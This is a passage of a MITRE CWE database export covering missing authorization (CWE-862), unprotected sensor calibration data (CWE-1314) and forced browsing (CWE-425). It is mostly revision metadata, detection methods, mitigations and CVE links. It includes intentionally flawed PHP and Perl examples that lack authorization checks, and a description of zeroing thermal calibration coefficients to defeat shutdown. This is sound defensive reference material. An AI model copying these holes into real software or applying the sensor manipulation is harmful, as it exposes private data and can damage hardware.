"ModificationComment": "updated Description, Potential_Mitigations",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships, Taxonomy_Mappings",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes, Relationships, Taxonomy_Mappings",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Description, Diagram, Relationships, Terminology_Notes",
"ModificationDate": "2024-11-19",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-11-19",
"ModificationVersion": "4.16",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "Suggested mappings to ISA/IEC 62443.",
"ContributionDate": "2023-04-25",
"ContributionName": "\"Mapping CWE to 62443\" Sub-Working Group",
"ContributionOrganization": "CWE-CAPEC ICS/OT SIG",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "Provided diagram to improve CWE usability",
"ContributionDate": "2024-02-29",
"ContributionName": "Abhi Balakrishnan",
"ContributionOrganization": null,
"ContributionReleaseDate": "2024-11-19",
"ContributionType": "Content",
"ContributionVersion": "4.16",
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
}
] |
Allowed-with-Review
|
This CWE entry is a Class and might have Base-level children that would be more appropriate
|
Examine children of this entry to see if there is a better fit
|
[
"Abstraction"
] | null |
[
{
"CweID": "285",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "\n\nAutomated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries.\n\n\nGenerally, automated static analysis tools have difficulty detecting custom authorization schemes. In addition, the software's design may include some functionality that is accessible to any user and does not require an authorization check; an automated technique that detects the absence of authorization may report false positives.\n",
"DetectionMethodID": "DM-6",
"Effectiveness": "Limited",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
},
{
"Description": "Automated dynamic analysis may find many or all possible interfaces that do not require authorization, but manual analysis is required to determine if the lack of authorization violates business logic.",
"DetectionMethodID": null,
"Effectiveness": null,
"EffectivenessNotes": null,
"Method": "Automated Dynamic Analysis"
},
{
"Description": "\n\nThis weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.\n\n\nSpecifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms.\n",
"DetectionMethodID": null,
"Effectiveness": "Moderate",
"EffectivenessNotes": "These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints.",
"Method": "Manual Analysis"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tBinary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Manual Static Analysis - Binary or Bytecode"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tWeb Application Scanner\n\t\tWeb Services Scanner\n\t\tDatabase Scanners",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Automated Results Interpretation"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tHost Application Interface Scanner\n\t\tFuzz Tester\n\t\tFramework-based Fuzzer",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Manual Results Interpretation"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tFocused Manual Spotcheck - Focused manual analysis of source\n\t\tManual Source Code Review (not inspections)",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Manual Static Analysis - Source Code"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tSource code Weakness Analyzer\n\t\tContext-configured Source Code Weakness Analyzer",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis - Source Code"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tHighly cost effective:\n```\n\n\t\tInspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)\n\t\tFormal Methods / Correct-By-Construction",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Architecture or Design Review"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This function runs an arbitrary SQL query on a given database, returning the result of the query.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tfunction runEmployeeQuery($dbName, $name){\n\t\tmysql_select_db($dbName,$globalDbHandle) or die(\"Could not open Database\".$dbName);\n```\n//Use a prepared statement to avoid CWE-89* \n\t\t$preparedStatement = $globalDbHandle->prepare('SELECT * FROM employees WHERE name = :name');\n\t\t$preparedStatement->execute(array(':name' => $name));\n\t\treturn $preparedStatement->fetchAll();}\n\t\n\t */.../* \n\t\n\t$employeeRecord = runEmployeeQuery('EmployeeDB',$_GET['EmployeeName']);",
"IntroText": null,
"Language": "PHP",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-95"
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tsub DisplayPrivateMessage {\n\t\tmy($id) = @_;\n\t\tmy $Message = LookupMessageObject($id);\n\t\tprint \"From: \" . encodeHTML($Message->{from}) . \"<br>\\n\";\n\t\tprint \"Subject: \" . encodeHTML($Message->{subject}) . \"\\n\";\n\t\tprint \"<hr>\\n\";\n\t\tprint \"Body: \" . encodeHTML($Message->{body}) . \"\\n\";\n\t}\n\tmy $q = new CGI;\n```\n# For purposes of this example, assume that CWE-309 and* \n\t\n\t\n\t\n\t *# CWE-523 do not apply.* \n\tif (! AuthenticateUser($q->param('username'), $q->param('password'))) {\n\t```\n\t\tExitError(\"invalid username or password\");\n\t}\n\tmy $id = $q->param('id');\n\tDisplayPrivateMessage($id);\n```",
"IntroText": null,
"Language": "Perl",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "One way to avoid this problem would be to ensure that the \"to\" field in the message object matches the username of the authenticated user.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-96"
}
] | null |
/data/images/CWE-862-Diagram.png
|
High
|
[
"An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: \"No access\", \"Read access\", \"Change access\", and \"Full control\". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object."
] | 1
|
[
[
"284",
"285",
"862"
]
] |
[
"1314",
"425",
"638",
"939"
] |
1314
|
Missing Write Protection for Parametric Data Values
|
Base
|
Simple
|
Draft
|
The device does not write-protect the parametric data values for sensors that scale the sensor value, allowing untrusted software to manipulate the apparent result and potentially damage hardware or cause operational failure.
|
Various sensors are used by hardware to detect any devices operating outside of the design limits. The threshold limit values are set by hardware fuses or trusted software such as the BIOS. These limits may be related to thermal, power, voltage, current, and frequency. Hardware mechanisms may be used to protect against alteration of the threshold limit values by untrusted software.
The limit values are generally programmed in standard units for the type of value being read. However, the hardware-sensor blocks may report the settings in different units depending upon sensor design and operation. The raw sensor output value is converted to the desired units using a scale conversion based on the parametric data programmed into the sensor. The final converted value is then compared with the previously programmed limits.
While the limit values are usually protected, the sensor parametric data values may not be. By changing the parametric data, safe operational limits may be bypassed.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": null,
"Name": "Sensor Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "The lack of a requirement to protect parametric values may contribute to this weakness.",
"Phase": "Architecture and Design"
},
{
"Note": "The lack of parametric value protection may be a cause of this weakness.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Quality Degradation",
"DoS: Resource Consumption (Other)"
],
"Likelihood": [
"High"
],
"Note": "Sensor value manipulation, particularly thermal or power, may allow physical damage to occur or disabling of the device by a false fault shutdown causing a Denial-Of-Service.",
"Scope": [
"Availability"
]
}
] |
[
{
"Description": "Access controls for sensor blocks should ensure that only trusted software is allowed to change threshold limits and sensor parametric data.",
"Effectiveness": "High",
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
}
] |
[
{
"Description": "Kernel can inject faults in computations during the execution of TrustZone leading to information disclosure in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice and Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2017-8252",
"Reference": "CVE-2017-8252"
}
] | null | null |
[
"1"
] |
[
{
"Authors": [
"Adrian Tang",
"Simha Sethumadhavan",
"Salvatore Stolfo"
],
"Edition": null,
"ExternalReferenceID": "REF-1082",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "CLKSCREW: Exposing the Perils of Security-Oblivious Energy Management",
"URL": "https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-tang.pdf",
"URLDate": null
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-07-14",
"SubmissionName": "Hareesh Khattri, Parbati K. Manna, and Arun Kanuparthi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-12-10",
"SubmissionVersion": "4.3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "862",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Malicious software executes instructions to increase power consumption to the highest possible level while causing the clock frequency to increase to its maximum value. Such a program executing for an extended period of time would likely overheat the device, possibly resulting in permanent damage to the device. \n\n\nA ring, oscillator-based temperature sensor will generally report the sensed value as oscillator frequency rather than degrees centigrade. The temperature sensor will have calibration values that are used to convert the detected frequency into the corresponding temperature in degrees centigrade. \n\n\nConsider a SoC design where the critical maximum temperature limit is set in fuse values to 100C and is not modifiable by software. If the scaled thermal sensor output equals or exceeds this limit, the system is commanded to shut itself down. \n\n\nThe thermal sensor calibration values are programmable through registers that are exposed to system software. These registers allow software to affect the converted temperature output such that the output will never exceed the maximum temperature limit.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "The sensor frequency value is scaled by applying the function:\n\n```\n\tSensed Temp = a + b * Sensor Freq\n```\nwhere a and b are the programmable calibration data coefficients. Software sets a and b to zero ensuring the sensed temperature is always zero.",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "This weakness may be addressed by preventing access to a and b.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "The sensor frequency value is scaled by applying the function:\n\n```\n\tSensed Temp = a + b * Sensor Freq\n```\nwhere a and b are the programmable calibration data coefficients. Untrusted software is prevented from changing the values of either a or b, preventing this method of manipulating the temperature.",
"IntroText": null,
"Language": "Other",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"285",
"862",
"1314"
]
] |
[] |
425
|
Direct Request ('Forced Browsing')
|
Base
|
Simple
|
Incomplete
|
The web application does not adequately enforce appropriate authorization on all restricted URLs, scripts, or files.
|
Web applications susceptible to direct request attacks often make the false assumption that such resources can only be reached through a given navigation path and so only apply authorization at certain points in the path.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Web Based",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] |
[
{
"Description": "The \"forced browsing\" term could be misinterpreted to include weaknesses such as CSRF or XSS, so its use is discouraged.",
"Term": "forced browsing"
}
] |
[
{
"Note": null,
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Application Data",
"Modify Application Data",
"Execute Unauthorized Code or Commands",
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Availability",
"Access Control"
]
}
] |
[
{
"Description": "Apply appropriate access control authorizations for each access to all restricted URLs, scripts or files.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": null
},
{
"Description": "Consider using MVC based frameworks such as Struts.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
}
] |
[
{
"Description": "Access-control setting in web-based document collaboration tool is not properly implemented by the code, which prevents listing hidden directories but does not prevent direct requests to files in those directories.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-29238",
"Reference": "CVE-2022-29238"
},
{
"Description": "Python-based HTTP library did not scope cookies to a particular domain such that \"supercookies\" could be sent to any domain on redirect.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-23607",
"Reference": "CVE-2022-23607"
},
{
"Description": "Bypass authentication via direct request.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2004-2144",
"Reference": "CVE-2004-2144"
},
{
"Description": "Infinite loop or infoleak triggered by direct requests.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1892",
"Reference": "CVE-2005-1892"
},
{
"Description": "Bypass auth/auth via direct request.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2004-2257",
"Reference": "CVE-2004-2257"
},
{
"Description": "Direct request leads to infoleak by error.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1688",
"Reference": "CVE-2005-1688"
},
{
"Description": "Direct request leads to infoleak by error.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1697",
"Reference": "CVE-2005-1697"
},
{
"Description": "Direct request leads to infoleak by error.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1698",
"Reference": "CVE-2005-1698"
},
{
"Description": "Authentication bypass via direct request.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1685",
"Reference": "CVE-2005-1685"
},
{
"Description": "Authentication bypass via direct request.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1827",
"Reference": "CVE-2005-1827"
},
{
"Description": "Authorization bypass using direct request.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1654",
"Reference": "CVE-2005-1654"
},
{
"Description": "Access privileged functionality using direct request.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1668",
"Reference": "CVE-2005-1668"
},
{
"Description": "Upload arbitrary files via direct request.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1798",
"Reference": "CVE-2002-1798"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Direct Request aka 'Forced Browsing'",
"MappingFit": null,
"TaxonomyName": "PLOVER"
},
{
"EntryID": "A10",
"EntryName": "Failure to Restrict URL Access",
"MappingFit": "CWE More Specific",
"TaxonomyName": "OWASP Top Ten 2007"
},
{
"EntryID": "A1",
"EntryName": "Unvalidated Input",
"MappingFit": "CWE More Specific",
"TaxonomyName": "OWASP Top Ten 2004"
},
{
"EntryID": "A2",
"EntryName": "Broken Access Control",
"MappingFit": "CWE More Specific",
"TaxonomyName": "OWASP Top Ten 2004"
},
{
"EntryID": "34",
"EntryName": "Predictable Resource Location",
"MappingFit": null,
"TaxonomyName": "WASC"
},
{
"EntryID": "SFP30",
"EntryName": "Missing endpoint authentication",
"MappingFit": null,
"TaxonomyName": "Software Fault Patterns"
}
] |
[
"127",
"143",
"144",
"668",
"87"
] | null |
[
{
"Note": "Overlaps Modification of Assumed-Immutable Data (MAID), authorization errors, container errors; often primary to other weaknesses such as XSS and SQL injection.",
"Type": "Relationship"
},
{
"Note": "\"Forced browsing\" is a step-based manipulation involving the omission of one or more steps, whose order is assumed to be immutable. The application does not verify that the first step was performed successfully before the second step. The consequence is typically \"authentication bypass\" or \"path disclosure,\" although it can be primary to all kinds of weaknesses, especially in languages such as PHP, which allow external modification of assumed-immutable variables.",
"Type": "Theoretical"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "added/updated demonstrative examples",
"ModificationDate": "2008-07-01",
"ModificationName": "Sean Eidemiller",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "Suggested OWASP Top Ten 2004 mapping",
"ModificationDate": "2008-08-15",
"ModificationName": null,
"ModificationOrganization": "Veracode",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Alternate_Terms, Relationships, Relationship_Notes, Taxonomy_Mappings, Theoretical_Notes",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2008-10-14",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2010-02-16",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Description, Relationships",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
